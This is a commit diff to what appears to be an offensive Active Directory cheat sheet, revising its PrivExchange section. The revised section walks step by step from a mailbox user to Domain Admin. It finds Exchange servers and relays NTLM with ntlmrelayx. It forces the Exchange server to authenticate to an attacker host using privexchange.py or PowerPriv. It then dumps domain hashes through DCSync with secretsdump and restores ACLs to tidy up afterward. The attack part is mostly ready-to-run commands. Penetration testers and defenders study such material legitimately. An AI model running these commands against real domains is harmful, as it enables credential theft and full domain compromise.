Update PrivExchange based on chryzsh blog post
parent
a14b3af934
commit
859695e2be
|
@ -741,22 +741,46 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
|
|||
|
||||
### PrivExchange attack
|
||||
|
||||
Exchange your privileges for Domain Admin privs by abusing Exchange.
|
||||
You need a shell on a user account with a mailbox.
|
||||
Exchange your privileges for Domain Admin privs by abusing Exchange.
|
||||
:warning: You need a shell on a user account with a mailbox.
|
||||
|
||||
|
||||
1. Exchange server hostname or IP address
|
||||
|
||||
```bash
|
||||
pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
|
||||
```
|
||||
|
||||
|
||||
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
|
||||
|
||||
```powershell
|
||||
ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username
|
||||
```
|
||||
|
||||
|
||||
3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
|
||||
|
||||
1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
|
||||
```bash
|
||||
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
|
||||
python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
|
||||
python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
|
||||
|
||||
# https://github.com/G0ldenGunSec/PowerPriv
|
||||
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
|
||||
```
|
||||
|
||||
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
|
||||
3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
|
||||
4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
|
||||
|
||||
```bash
|
||||
python secretsdump.py xxxxxxxxxx -just-dc
|
||||
python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
|
||||
```
|
||||
|
||||
5. Clean your mess and restore a previous state of the user's ACL
|
||||
|
||||
```powershell
|
||||
python aclpwn.py --restore ../aclpwn-20190319-125741.restore
|
||||
```
|
||||
|
||||
Alternatively you can use the Metasploit module
|
||||
|
@ -847,4 +871,5 @@ Most of the time the best passwords to spray are :
|
|||
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
|
||||
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)
|
||||
* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence)
|
||||
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
|
||||
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
|
||||
* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/)
|
Loading…
Reference in New Issue